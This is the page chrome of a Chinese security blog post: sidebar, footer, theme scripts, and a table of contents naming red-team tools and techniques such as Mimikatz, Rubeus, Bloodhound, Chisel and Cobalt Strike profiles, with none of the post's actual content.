          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/04/关于杀软对抗的议题拓展/" rel="prev" title="关于CIS" 杀软对抗"的议题拓展">
                关于CIS"杀软对抗"的议题拓展 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/Bloglogo.jpg" alt="scareing">
            
              <p class="site-author-name" itemprop="name">scareing</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/scareing" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:scareing@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#工具"><span class="nav-number">1.</span> <span class="nav-text">工具</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Mimikatz"><span class="nav-number">1.1.</span> <span class="nav-text">Mimikatz</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mimikatz-ptt-net-use-schtasks-横向"><span class="nav-number">1.1.1.</span> <span class="nav-text">mimikatz ptt + net use + schtasks 横向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Hash-rdp"><span class="nav-number">1.1.2.</span> <span class="nav-text">Hash rdp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ServerScan"><span class="nav-number">1.2.</span> <span class="nav-text">ServerScan</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Seatbelt"><span class="nav-number">1.3.</span> <span class="nav-text">Seatbelt</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PsExec64"><span class="nav-number">1.4.</span> <span class="nav-text">PsExec64</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Rubeus"><span class="nav-number">1.5.</span> <span class="nav-text">Rubeus</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#AdExplorer"><span class="nav-number">1.6.</span> <span class="nav-text">AdExplorer</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bloodhound"><span class="nav-number">1.7.</span> <span class="nav-text">Bloodhound</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ANGRYPUPPY"><span class="nav-number">1.8.</span> <span class="nav-text">ANGRYPUPPY</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MoveKit"><span class="nav-number">1.9.</span> <span class="nav-text">MoveKit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NPS"><span class="nav-number">1.10.</span> <span class="nav-text">NPS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CHISEL"><span class="nav-number">1.11.</span> <span class="nav-text">CHISEL</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#技巧"><span class="nav-number">2.</span> <span class="nav-text">技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS上线"><span class="nav-number">2.1.</span> <span class="nav-text">DNS上线</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CS配置文件（流量特征修改）"><span class="nav-number">2.2.</span> <span class="nav-text">CS配置文件（流量特征修改）</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">scareing</span>

  
</div>









        







        
      </div>
    </footer>

    

    

    
       <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;"></canvas> 
       <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
       <script type="text/javascript" src="/js/src/fireworks.js"></script>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
